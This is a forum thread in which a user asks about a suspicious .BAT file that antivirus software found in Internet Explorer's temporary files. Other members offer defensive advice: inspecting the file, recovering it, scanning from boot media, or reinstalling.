Results 1 to 10 of 10

Thread: need help .BAT file extension

  1. #1
    Member
    Join Date
    Jul 2003
    Posts
    80

    need help .BAT file extension

    Hi,

    Lately when i've been on the the internet an error message pops up saying that i have performed and illegal operation. When i click ok, my browser closes (IE ver.6). After a few messages i shut down my computer. The next day when i turned it on my desktop background was gone and there was a message in the background saying that my active desktop had been shutdown. So i reactivated it by clicking on a help link. My mom ran a virus scan without me knowing and AVG Virus Scan found a .BAT extension file that was located in
    C:\WINDOWS\Temporary Internet Files\CONTENT.IE5\PZV5FHV4\FLASH1~1.ZIP:\FLASH-BR.BAT

    I read up a little on BAT files extension a i learned that they represent a DOS batch file, a text file made up of a string of DOS commands that run in sequence when the batch file is executed. I'm not sure if this file has been opened but i think it might have done some damage to my PC.

    Any advice? Plz respond.

    THnks,
    BD]Hobbit
    http://www.AntiOnline.com/sig.php?imageid=442
    You need people of intelligence on this sort of quest...

  2. #2
    Senior Member Zonewalker's Avatar
    Join Date
    Jul 2002
    Posts
    949
    if you use notepad to open up the batch file (don't run the batch file just open it - it won't do any damage unless you actually run the batch file) and C&P the contents here then we might be able to tell you if it will damage your computer at all if has been run

    Z
    Quis Custodiet Ipsos Custodes

  3. #3
    Right turn Clyde Nokia's Avatar
    Join Date
    Aug 2003
    Location
    Button Moon
    Posts
    1,696
    Did your AV say it was a virus or just that it had found a .BAT file?

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    right click on the .bat file and select edit. select all, copy post it here. im sure we can tell you what you need to do to fix what it has changed.

    there is a vuln in IE where by just viewing a web page your browser is forced to download a file without your knowledge then that file can be run by using a double-slash in a codebase to bypass security and run the file in the 'my computer' zone.

    not only hackers use this but scum-ware distributors as well
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  5. #5
    Member
    Join Date
    Jul 2003
    Posts
    80
    Yes, my AV did say that there was a virus infection detected and it contained a hidden BAT file extension. Unfortunately, i can't copy and paste it from notepad b/c my mom emptied the temporary internet files and now i dont know how to get to the file b/c i can't find it. Is there anything else i can do?

    Thanks for your help so far,
    BD]Hobbit
    http://www.AntiOnline.com/sig.php?imageid=442
    You need people of intelligence on this sort of quest...

  6. #6
    You may want to try to get that file back by undeleting it using this utility called R-Undelete - http://www.r-undelete.com/File_Undelete_Download.shtml

    Then post the text here as Tedob1 said and we'll all help you.

    My company had a BAT virus infection on one of it's PCs and was related to the Folding@Home web site - someone trojanized the install or the app.

  7. #7
    If it is a temporary internet file it couldn't hurt you're PC to delete it so I would just go ahead and delete it after you figure out if it is damaging. Also i had a Virus scanner called "PC Cillin" that Qurentined literally thousands of critical .DLL files and .EXE files that were suposedly "infected" but i couldn't tell if they really were or not. They were all critical files so i had to restore them virus or not. I had been recieving a Windows XP error telling me that system critical files had either been changed or removed and even after restoring thousands of Quarentined files I still ended up having to reinstall my Operating System to stop the supid error messages. The moral is if it is in you're Qurentined files folder it is not allways a virus cuz allot of the time the scanners are verry sensitive and pick up a lot of legit file so use good judgement with virus scanners.

  8. #8
    Member
    Join Date
    Jul 2003
    Posts
    80
    well since the file is deleted it soudn't do any more dmg but my cousin who works at a computer repair shop offered to look at it and fix any damage.
    problem solved

    Thanks for the help
    BD]Hobbit
    http://www.AntiOnline.com/sig.php?imageid=442
    You need people of intelligence on this sort of quest...

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,785
    i realy dont think a computer repair shop is a good solution. A batch file dosn't have to cause any damage to be dangerous. a bat file can be used to download and install ANYTHING with out you knowing it then add an entry to you registry to run it on start-up. i dont think an a++ by itself gives a technician the knowledge to even know what to look for. it may be nothing or you could be owned. if your just going to take it to a repair shop youd do better to have him reformat and reinstall everything
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  10. #10
    Junior Member
    Join Date
    Mar 2003
    Posts
    2
    Can you run an antivirus program that isn't dependent on the hard drive this occured with? As an example, Symantec will run from the CD. Either that, or you may have another computer you can put the questionable drive into and run good antivirus software against it.

    My thoughts here are that a batch file could have done anything to your computer, but that doesn't mean that it did. If you can run a full file system scan, you can see if you have a problem or not.

    The reason to not just run your own antivirus client on the drive that may be infected is that some virii disable AV software, so you get a false negative.

    The reason to not just reformat and wipe is that putting in the text string (without quotes) "flash-br" calls up nothing in Google that is related to a virus, nor does entering this in at www.sarc.com. You may still decide to wipe the drive, but that may be akin to killing a fly with a thermonuclear device.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •